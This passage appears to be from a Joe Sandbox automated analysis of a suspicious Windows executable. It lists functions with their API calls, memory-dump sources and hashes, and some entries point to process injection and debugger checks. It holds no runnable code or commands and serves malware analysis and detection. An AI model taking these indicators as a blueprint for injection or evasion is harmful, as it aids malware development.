                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: IconNotifyShell_$_memset
                                    • String ID:
                                    • API String ID: 1505330794-0
                                    • Opcode ID: 32f9bb7f50b88902ddebb41f0e5096649fc7ce7bc7bd703bc18b0f163e77e470
                                    • Instruction ID: 907cc04bfcda8d93e0e0ea48139ab72f56633ac71845669eab1a21ab75eb1235
                                    • Opcode Fuzzy Hash: 32f9bb7f50b88902ddebb41f0e5096649fc7ce7bc7bd703bc18b0f163e77e470
                                    • Instruction Fuzzy Hash: C13184B59083019FD720DF24D985B9BBBE4FB48314F00092EEA9AC3291D7756948EB52
                                    Function 00F2594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __FF_MSGBANNER.LIBCMT ref: 00F25963
                                      • Part of subcall function 00F2A3AB: __NMSG_WRITE.LIBCMT ref: 00F2A3D2
                                      • Part of subcall function 00F2A3AB: __NMSG_WRITE.LIBCMT ref: 00F2A3DC
                                    • __NMSG_WRITE.LIBCMT ref: 00F2596A
                                      • Part of subcall function 00F2A408: GetModuleFileNameW.KERNEL32(00000000,00FC43BA,00000104,00000000,00000001,00000000), ref: 00F2A49A
                                      • Part of subcall function 00F2A408: ___crtMessageBoxW.LIBCMT ref: 00F2A548
                                      • Part of subcall function 00F232DF: ___crtCorExitProcess.LIBCMT ref: 00F232E5
                                      • Part of subcall function 00F232DF: ExitProcess.KERNEL32 ref: 00F232EE
                                      • Part of subcall function 00F28D68: __getptd_noexit.LIBCMT ref: 00F28D68
                                    • RtlAllocateHeap.NTDLL(01970000,00000000,00000001), ref: 00F2598F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                    • String ID:
                                    • API String ID: 1372826849-0
                                    • Opcode ID: 4fffc8841b5c9720ab126ada1667640759bea9f7cf80940486574977df92e759
                                    • Instruction ID: 74aa16f0dd3015cc757374581820f623cbea644d6977007504fd60110ed97041
                                    • Opcode Fuzzy Hash: 4fffc8841b5c9720ab126ada1667640759bea9f7cf80940486574977df92e759
                                    • Instruction Fuzzy Hash: F301F532641B3ADFE6157B64FC53B6E72588F41F70F50002AF4049B1C1DE789D82B660
                                    Function 00F69B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00F697D2,?,?,?,?,?,00000004), ref: 00F69B45
                                    • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00F697D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 00F69B5B
                                    • CloseHandle.KERNEL32(00000000,?,00F697D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00F69B62
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: File$CloseCreateHandleTime
                                    • String ID:
                                    • API String ID: 3397143404-0
                                    • Opcode ID: 5b8f5e0c9d74bd5a6115c7b3ab1c1b9eace1bbb55f96294c8cd63e6df0617373
                                    • Instruction ID: ffff22a7c0cb256b0c4ad070b91d9ea44a7770c97409b899b52dfc9dffa76881
                                    • Opcode Fuzzy Hash: 5b8f5e0c9d74bd5a6115c7b3ab1c1b9eace1bbb55f96294c8cd63e6df0617373
                                    • Instruction Fuzzy Hash: 11E08632580618BBD7212B54EC0DFDA7B18EB05771F104120FB24A90E087B12625A798
                                    Function 00F68F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 00F68FA5
                                      • Part of subcall function 00F22F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00F29C64), ref: 00F22FA9
                                      • Part of subcall function 00F22F95: GetLastError.KERNEL32(00000000,?,00F29C64), ref: 00F22FBB
                                    • _free.LIBCMT ref: 00F68FB6
                                    • _free.LIBCMT ref: 00F68FC8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                    • Instruction ID: 2ce24f2ab47be2d929a9f01f5c75fcad0a32ffe4754ae9b6862ecce6c1c2d0de
                                    • Opcode Fuzzy Hash: 358057a8cee776a4634d1da6a11f7167cf7af4a4bc472a0de26b354d0d310ced
                                    • Instruction Fuzzy Hash: CAE012A1B097115ACA64A578BE41A9367FE5F483A0718091DB409DB146DE28E842A124
                                    Function 00F0AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: CALL
                                    • API String ID: 0-4196123274
                                    • Opcode ID: 0407687e75c45fbf264d53bb2d90d2ed3e6b78a88f85ae1c7d65044f9a981fde
                                    • Instruction ID: 40c8b9c04a3f26126f98101e78e13d64d4ce49ebed4230dce0cc9c7b4ab1255d
                                    • Opcode Fuzzy Hash: 0407687e75c45fbf264d53bb2d90d2ed3e6b78a88f85ae1c7d65044f9a981fde
                                    • Instruction Fuzzy Hash: BC223A75908341CFC724DF14C894B6ABBE1BF84310F15895DE9968B2A2DB35EC85FB82
                                    Function 00F04DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID: EA06
                                    • API String ID: 4104443479-3962188686
                                    • Opcode ID: 8e4aac51bcc1d8fbe888ffd9e2db8eb5adfdd343b9e11929be97d40a9e014cb2
                                    • Instruction ID: 621ceb4bb1267141a7acd11e4fce224f5a6ac9cc08f2e7ecfc36134ecff254bc
                                    • Opcode Fuzzy Hash: 8e4aac51bcc1d8fbe888ffd9e2db8eb5adfdd343b9e11929be97d40a9e014cb2
                                    • Instruction Fuzzy Hash: F8419CF2E041586BCF218B64CC517BF7FA6AB41310F684079EE82DB2C2C665AD40B7A1
                                    Function 00F0492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                    Download Yara Rule
                                    APIs
                                    • 74A3C8D0.UXTHEME ref: 00F04992
                                      • Part of subcall function 00F235AC: __lock.LIBCMT ref: 00F235B2
                                      • Part of subcall function 00F235AC: RtlDecodePointer.NTDLL(00000001), ref: 00F235BE
                                      • Part of subcall function 00F235AC: RtlEncodePointer.NTDLL(?), ref: 00F235C9
                                      • Part of subcall function 00F04A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00F04A73
                                      • Part of subcall function 00F04A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F04A88
                                      • Part of subcall function 00F03B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F03B7A
                                      • Part of subcall function 00F03B4C: IsDebuggerPresent.KERNEL32 ref: 00F03B8C
                                      • Part of subcall function 00F03B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,00FC62F8,00FC62E0,?,?), ref: 00F03BFD
                                      • Part of subcall function 00F03B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00F03C81
                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F049D2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$DebuggerDecodeEncodeFullNamePathPresent__lock
                                    • String ID:
                                    • API String ID: 2688871447-0
                                    • Opcode ID: 5810b2cb4c4f770efe9d979ce65d40b578d9ae8f728013f21660081019e4683e
                                    • Instruction ID: e625f610cda2c7779a0483eb68efdae8fde8d74c4e97f8ca7e37040dd5875f06
                                    • Opcode Fuzzy Hash: 5810b2cb4c4f770efe9d979ce65d40b578d9ae8f728013f21660081019e4683e
                                    • Instruction Fuzzy Hash: DE118EB1A083159FC700EF29ED06D4AFFE8EB95710F00451EF445872A1DBB49545FB96
                                    Function 00F05DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00F05981,?,?,?,?), ref: 00F05E27
                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00F05981,?,?,?,?), ref: 00F3E19C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 47a6c622024b119e736ec34d1efd498186aa2d4ac838a48bdf8332f4bfe397e5
                                    • Instruction ID: 8febd0ba682c8b1628fe9b6a513ed7de6216bec264f2c2478c2b5edfa0a058c9
                                    • Opcode Fuzzy Hash: 47a6c622024b119e736ec34d1efd498186aa2d4ac838a48bdf8332f4bfe397e5
                                    • Instruction Fuzzy Hash: 0C018071644608BEF3641E24CC8AF673A9CEB01B78F108318FAE55A1E0C6F41E49AF50
                                    Function 00F2582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __lock_file_memset
                                    • String ID:
                                    • API String ID: 26237723-0
                                    • Opcode ID: 0a8fb60efd2ace7a13d32496eb7bad30b430569ab142ce0d22c944703671f1ed
                                    • Instruction ID: 5b6f8bc74a67751cce10e8064584c517e953729c4f338c8ce033a63428d74402
                                    • Opcode Fuzzy Hash: 0a8fb60efd2ace7a13d32496eb7bad30b430569ab142ce0d22c944703671f1ed
                                    • Instruction Fuzzy Hash: D401D871C01628EBCF21AF65AC015CF7F61AF80760F044215B8145B1A1DB798612FF91
                                    Function 00F255D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00F28D68: __getptd_noexit.LIBCMT ref: 00F28D68
                                    • __lock_file.LIBCMT ref: 00F2561B
                                      • Part of subcall function 00F26E4E: __lock.LIBCMT ref: 00F26E71
                                    • __fclose_nolock.LIBCMT ref: 00F25626
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                    • String ID:
                                    • API String ID: 2800547568-0
                                    • Opcode ID: 116d0f52f168b11e034177e65fc3641e22a31755ff1af0bee8f5f4a43db57423
                                    • Instruction ID: 6b66422bb0e38f03655752f34b6c0deb729e6b04f96295d3a3bff863613fde8c
                                    • Opcode Fuzzy Hash: 116d0f52f168b11e034177e65fc3641e22a31755ff1af0bee8f5f4a43db57423
                                    • Instruction Fuzzy Hash: F2F0B472C01A359BDB21BF75BC0276E7BA16F40B74F558209A424AB1C1CF7C8902BF55
                                    Function 018E12FD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 018E1ABB
                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 018E1B51
                                    • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 018E1B73
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2081259592.00000000018E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 018E0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_18e0000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                    • String ID:
                                    • API String ID: 2438371351-0
                                    • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                    • Instruction ID: 40c359918ba74528485062132b28a043b4559317d164fe379640609e852c5c65
                                    • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                    • Instruction Fuzzy Hash: 1F12ED24E24658C6EB24DF64D8547DEB272EF68300F1090E9910DEB7A4E77A4F81CF5A
                                    Function 00F12123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 23506ec64a052a19ed558fbb52005abc7f36a527b765a856fe9a17407cfba0b2
                                    • Instruction ID: fe44bc459667b3c58ec3d2a4c6107c7467671977c02395b35bdc06386dc5fb56
                                    • Opcode Fuzzy Hash: 23506ec64a052a19ed558fbb52005abc7f36a527b765a856fe9a17407cfba0b2
                                    • Instruction Fuzzy Hash: 1B51AF35A00604AFCF14EB54CD95FAE77A5AF45720F148168F806AB2C2DB78ED04FB41
                                    Function 00F0766F Relevance: 1.6, APIs: 1, Instructions: 103COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: _memmove
                                    • String ID:
                                    • API String ID: 4104443479-0
                                    • Opcode ID: 137ddfd0232708e3b58a8764eb2c3eda55301eb74d4565348677704d51d6fb2f
                                    • Instruction ID: c9fa5212a7f9b5b5feac9de9b026e0488fd6224456a300e6572bcbcf1d2717ab
                                    • Opcode Fuzzy Hash: 137ddfd0232708e3b58a8764eb2c3eda55301eb74d4565348677704d51d6fb2f
                                    • Instruction Fuzzy Hash: E131A675A08B12DFC724AF18D590A21F7A0FF08360714C5A9E95A8B7D5E730E881FB84
                                    Function 00F05C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00F05CF6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: f8b54761214def38c6261e3fc20fa292f2ff684f49c55f2e46f9780c12a10012
                                    • Instruction ID: c3dbe9924fd81695a7fcacb9bf49e2af6d678a64f262043063a65cab832aafa9
                                    • Opcode Fuzzy Hash: f8b54761214def38c6261e3fc20fa292f2ff684f49c55f2e46f9780c12a10012
                                    • Instruction Fuzzy Hash: A5317C31A00B0AAFDB18DF69C48466EB7B5FF48720F14862AD81993790D7B0A950EF90
                                    Function 00F400D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ClearVariant
                                    • String ID:
                                    • API String ID: 1473721057-0
                                    • Opcode ID: 6614da81bb477a32e4fa0c6544671e16a64b2371e9a90bef8710a928bdd4c480
                                    • Instruction ID: 4319c6d2a83da79640d552e68aad814e41674ff6db508842d19dedebefb1706c
                                    • Opcode Fuzzy Hash: 6614da81bb477a32e4fa0c6544671e16a64b2371e9a90bef8710a928bdd4c480
                                    • Instruction Fuzzy Hash: 04411B74908351CFDB14DF14C884B1ABBE1BF45318F19889CE9894B3A2C776EC45EB52
                                    Function 00F05B19 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
